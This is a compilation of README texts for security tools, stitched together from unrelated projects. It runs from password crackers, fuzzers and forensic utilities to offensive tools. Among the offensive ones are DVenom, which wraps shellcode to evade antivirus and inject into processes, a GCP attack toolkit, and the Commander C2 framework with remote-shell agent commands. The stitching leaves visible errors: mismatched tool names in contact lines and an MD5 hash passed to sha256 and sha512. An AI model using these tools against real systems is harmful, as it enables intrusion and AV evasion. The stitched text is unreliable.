python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity
This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123
This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel
This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.
These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.
This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.
Contributions are welcome! To contribute to PassBreaker, follow these steps:
If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:
PassBreaker is released under the MIT License. See LICENSE for more information.
C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.
To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.
After acquiring your API key, execute the following command to search servers:
c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]
Replace <TARGET_DOMAIN>
with the desired IP address or domain, <TARGET_PORT>
with the port you wish to scan, and <API_KEY>
with your Netlas API key. Use the optional -v
flag for verbose output. For example, to search at the google.com
IP address on port 443
using the Netlas API key 1234567890abcdef
, enter:
c2detect -t google.com -p 443 -s 1234567890abcdef
To download a release of the utility, follow these steps:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>
To build and start the Docker container for this project, run the following commands:
docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v
To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:
./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help
This will display the help message with available options. To search for C2 servers, run the following command:
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>
This will display a list of C2 servers found in the given IP address or domain.
Name | Support |
---|---|
Metasploit | β |
Havoc | β |
Cobalt Strike | β |
Bruteratel | β |
Sliver | β |
DeimosC2 | β |
PhoenixC2 | β |
Empire | β |
Merlin | β |
Covenant | β |
Villain | β |
Shad0w | β |
PoshC2 | β |
Legend:
If you'd like to contribute to this project, please feel free to create a pull request.
This project is licensed under the License - see the LICENSE file for details.
Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
it enables investigators to identify suspicious artifacts on ICS environment for detection of compromised devices during incident response or manual check.
open source framework, which allows investigators to verify the actions of the tool or customize it to specific needs.
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
git clone https://github.com/microsoft/ics-forensics-tools.git
Install python requirements
pip install -r requirements.txt
Args | Description | Required / Optional |
---|---|---|
-h , --help
| show this help message and exit | Optional |
-s , --save-config
| Save config file for easy future usage | Optional |
-c , --config
| Config file path, default is config.json | Optional |
-o , --output-dir
| Directory in which to output any generated files, default is output | Optional |
-v , --verbose
| Log output to a file as well as the console | Optional |
-p , --multiprocess
| Run in multiprocess mode by number of plugins/analyzers | Optional |
Args | Description | Required / Optional |
---|---|---|
-h , --help
| show this help message and exit | Optional |
--ip | Addresses file path, CIDR or IP addresses csv (ip column required). add more columns for additional info about each ip (username, pass, etc...) | Required |
--port | Port number | Optional |
--transport | tcp/udp | Optional |
--analyzer | Analyzer name to run | Optional |
python driver.py -s -v PluginName --ip ips.csv
python driver.py -s -v PluginName --analyzer AnalyzerName
python driver.py -s -v -c config.json --multiprocess
from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig
forensic = ForensicClient()
plugin = PluginConfig.from_json({
"name": "PluginName",
"port": 123,
"transport": "tcp",
"addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
"parameters": {
},
"analyzers": []
})
forensic.scan([plugin])
When developing locally make sure to mark src folder as "Sources root"
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport
class GeneralCLI(PluginCLI):
def __init__(self, folder_name):
super().__init__(folder_name)
self.name = "General"
self.description = "General Plugin Description"
self.port = 123
self.transport = Transport.TCP
def flags(self, parser):
self.base_flags(parser, self.port, self.transport)
parser.add_argument('--general', help='General additional argument', metavar="")
class General(PluginInterface):
def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)
def connect(self, address):
self.logger.info(f"{self.config.name} connect")
def export(self, extracted):
self.logger.info(f"{self.config.name} export")
__init__.py
file under the plugins folderfrom pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig
class General(AnalyzerInterface):
def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)
self.plugin_name = 'General'
self.create_output_dir(self.plugin_name)
def analyze(self):
pass
__init__.py
file under the analyzers folderMicrosoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.
Section 52 under MSRC blog
ICS Lecture given about the tool
Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube
This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.
When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.
This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.
This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.
Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.
Install requirements
pip3 install -r requirements.txt
Run the script
python3 forbidden_buster.py -u http://example.com
Forbidden Buster accepts the following arguments:
-h, --help show this help message and exit
-u URL, --url URL Full path to be used
-m METHOD, --method METHOD
Method to be used. Default is GET
-H HEADER, --header HEADER
Add a custom header
-d DATA, --data DATA Add data to requset body. JSON is supported with escaping
-p PROXY, --proxy PROXY
Use Proxy
--rate-limit RATE_LIMIT
Rate limit (calls per second)
--include-unicode Include Unicode fuzzing (stressful)
--include-user-agent Include User-Agent fuzzing (stressful)
Example Usage:
python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent
Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!
Clone the repository:
git clone https://github.com/HalilDeniz/CryptoChat.git
Navigate to the project directory:
cd CryptoChat
Install the required dependencies:
pip install -r requirements.txt
$ python3 server.py --help
usage: server.py [-h] [--host HOST] [--port PORT]
Start the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
--------------------------------------------------------------------------
$ python3 client.py --help
usage: client.py [-h] [--host HOST] [--port PORT]
Connect to the chat server.
options:
-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.
$ python3 serverE.py --help
usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]
Start the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=0.0.0.0)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
--------------------------------------------------------------------------
$ python3 clientE.py --help
usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]
Connect to the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=127.0.0.1)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encr yption. (Default=mysecretpassword)
--help
: show this help message and exit--host
: The IP address to bind the server.--port
: The port number to bind the server.--key
: The secret key for encryptionContributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.
If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:
Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.
Afuzz is being actively developed by @rapiddns
git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install
OR
pip install afuzz
afuzz -u http://testphp.vulnweb.com -t 30
Table
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```
Json
{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}
Summary:
%EXT%
keyword with extensions from -e flag.If no flag -e, the default is used.Examples:
index.%EXT%
Passing asp and aspx extensions will generate the following dictionary:
index
index.asp
index.aspx
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip
Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:
test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip
# ###### ### ### ###### ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######
usage: afuzz [options]
An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)
Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.
afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3
The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.
In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.
afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50
The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages
The blacklist.txt file is the same as dirsearch.
The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title
The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.
Thanks to open source projects for inspiration
Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
To clone and run this application, you'll need Git installed on your computer. From your command line:
# Clone this repository
$ git clone https://github.com/zerx0r/dvenom
# Go into the repository
$ cd dvenom
# Build the application
$ go build /cmd/dvenom/
After installation, you can run the tool using the following command:
./dvenom -h
To generate c# source code that contains encrypted shellcode.
Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.
./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs
Language | Supported Methods | Supported Encryption |
---|---|---|
C# | valloc, pinject, hollow, ntinject | xor, rot, aes256, rc4 |
Rust | pinject, hollow, ntinject | xor, rot, rc4 |
PowerShell | valloc, pinject | xor, rot |
ASPX | valloc | xor, rot |
VBA | valloc | xor, rot |
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
This project is licensed under the MIT License - see the LICENSE file for details.
Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.
A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.
WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:
Does This Tool Bypass 403 ?
It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.
In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.
Β
pip install WebSecProbe
WebSecProbe <URL> <Path>
Example:
WebSecProbe https://example.com admin-login
from WebSecProbe.main import WebSecProbe
if __name__ == "__main__":
url = 'https://example.com' # Replace with your target URL
path = 'admin-login' # Replace with your desired path
probe = WebSecProbe(url, path)
probe.run()
TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.
Clone the repository:
git clone https://github.com/HalilDeniz/TrafficWatch.git
Navigate to the project directory:
cd TrafficWatch
Install the required dependencies:
pip install -r requirements.txt
python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]
Packet Sniffer Tool
options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display
To analyze packets from a PCAP file, use the following command:
python trafficwatch.py -f path/to/your.pcap
To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:
python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10
-f
or --file
: Path to the PCAP file for analysis.-p
or --protocol
: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).-c
or --count
: Limit the number of displayed packets.Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.
If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:
This project is licensed under the MIT License.
Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!"Β
GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.
Resource Category | Primary Module | Command Group | Operation | Description |
---|---|---|---|---|
User Authentication | auth | - | activate | Activate a Specific Authentication Method |
- | add | Add a New Authentication Method | ||
- | delete | Remove a Specific Authentication Method | ||
- | list | List All Available Authentication Methods | ||
Cloud Functions | functions | - | list | List All Deployed Cloud Functions |
- | permissions | Display Permissions for a Specific Cloud Function | ||
- | triggers | List All Triggers for a Specific Cloud Function | ||
Cloud Storage | storage | buckets | list | List All Storage Buckets |
permissions | Display Permissions for Storage Buckets | |||
Compute Engine | compute | instances | add-ssh-key | Add SSH Key to Compute Instances |
Python 3.11 or newer should be installed. You can verify your Python version with the following command:
python --version
git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install
pip install gator-red
Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!
If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:
Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.
Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.
Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.
Submit the Issue: After you've filled out all the necessary information, click Submit new issue.
Your feedback is important, and will help improve the tool. I appreciate your contribution!
I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.
Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.
I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.
Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!
Thank you for considering contributing to the project.
If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)
SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.
At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.
SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.
SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.
SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.
Embrace the power of integrated DevSecOps with SecuSphere β secure your software development, from code to cloud.
SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.
SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.
For more information please refer to our Official Rest API Documentation
SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.
SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.
Get started with SecuSphere using our comprehensive user guide.
You can install SecuSphere by cloning the repository, setting up locally, or using Docker.
$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git
Navigate to the source directory and run the Python file:
$ cd src/
$ python run.py
Build and run the Dockerfile in the cicd directory:
$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest
Use Docker Compose in the ci_cd/iac/
directory:
$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up
Pull the latest version of SecuSphere from Docker Hub and run it:
$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest
We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.
We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.
Commander is a command and control framework (C2) written in Python, Flask and SQLite. ItΒ comes with two agents written in Python and C.
Under Continuous Development
Not script-kiddie friendly
Python >= 3.6 is required to run and the following dependencies
Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt
First create the required certs and keys
# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes
Start the admin.py module first in order to create a local sqlite db file
python3 admin.py
Continue by running the server
python3 c2_server.py
And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.
# python agent
python3 agent.py
# C agent
gcc agent.c -o agent -lcurl -lb64
./agent
By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.
As the Operator/Administrator you can use the following commands to control your agents
Commands:
task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.
task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.
exit
Bye Bye!
Sessions:
sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is
Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P
The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.
Below you can find a normal flow diagram
In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.
More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.
